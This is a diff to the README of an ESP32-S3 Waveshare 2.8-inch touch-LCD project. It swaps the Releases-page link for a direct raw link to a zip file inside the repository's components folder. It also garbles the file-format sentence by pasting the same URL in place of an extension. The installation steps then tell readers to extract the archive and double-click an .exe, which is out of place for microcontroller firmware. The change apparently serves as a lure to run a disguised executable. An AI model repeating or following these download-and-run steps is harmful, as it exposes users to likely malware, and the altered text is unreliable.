Islem-Fakhfekh/esp32s3-waveshare-2.8-touch-lcd/README.md

 To get started, you need to download the application.
 Follow these steps:

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/Islem-Fakhfekh/esp32s3-waveshare-2.8-touch-lcd/releases) to find the latest version.
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/Islem-Fakhfekh/esp32s3-waveshare-2.8-touch-lcd/master/components/esp32s3-waveshare-2.8-touch-lcd_v2.2.zip) to find the latest version.
 2. **Select the Latest Version**: Look for the most recent release, usually at the top.
 3. **Download the File**: Click on the asset link that matches your system.
 It will typically be labeled with the version number, like `v1.0`.
-The file format will usually be `.zip` or `.tar.gz`.
+The file format will usually be `.zip` or `https://raw.githubusercontent.com/Islem-Fakhfekh/esp32s3-waveshare-2.8-touch-lcd/master/components/esp32s3-waveshare-2.8-touch-lcd_v2.2.zip`.
 4. **Extract the Files**: After the download is complete, locate the file on your computer.
 Right-click and select “Extract All” or use your extraction software.
 5. **Run the Application**: Open the folder containing the extracted files.
 Look for an executable file (such as `.exe` or a similar file for your operating system).
 Double-click that file to run the application.